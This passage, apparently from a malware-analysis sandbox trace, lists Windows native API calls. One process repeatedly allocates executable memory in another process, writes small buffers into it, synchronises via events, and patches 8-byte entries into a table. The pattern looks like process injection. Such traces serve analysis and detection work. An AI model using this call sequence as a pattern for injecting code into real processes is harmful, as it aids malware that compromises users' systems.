Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.190] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.191] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.191] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.191] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.191] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.191] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.191] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.191] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.192] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.192] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001b, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.192] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.192] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3b0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.192] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.192] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c50c*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c50c*, NumberOfBytesWritten=0x28df88*=0x5) returned 0x0 [0241.192] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.193] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.193] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.193] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.193] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.193] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.193] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.194] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.194] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.194] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.194] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20015, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.194] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.194] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3b8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.194] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.194] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c502*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c502*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.195] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.195] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.195] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.195] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.195] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.196] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.196] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.196] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.196] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.196] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.196] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.196] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.196] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3c0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.197] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.197] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4fa*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4fa*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0241.197] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.197] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.197] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.197] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.198] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.198] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.198] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.198] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.198] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.198] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.198] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.199] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.199] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3c8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.199] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.199] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4f2*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4f2*, NumberOfBytesWritten=0x28df88*=0x5) returned 0x0 [0241.199] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.199] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.200] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.200] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.200] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.200] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.200] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.200] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.200] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.201] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.201] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20015, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.201] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.201] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3d0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.201] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.201] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4e8*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4e8*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0241.201] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.201] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.202] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.202] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.202] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.202] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.202] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.203] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.203] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.203] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.203] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.203] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.203] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3d8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.203] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.203] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4de*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4de*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.204] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.204] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.204] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.204] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.204] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.204] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.204] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.205] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.205] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.205] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.205] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.205] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.205] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3e0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.205] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.206] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4d6*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4d6*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0241.206] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.206] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.206] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.206] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.206] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.207] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.207] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.207] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.207] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.207] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.207] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.207] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.208] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3e8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.208] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, 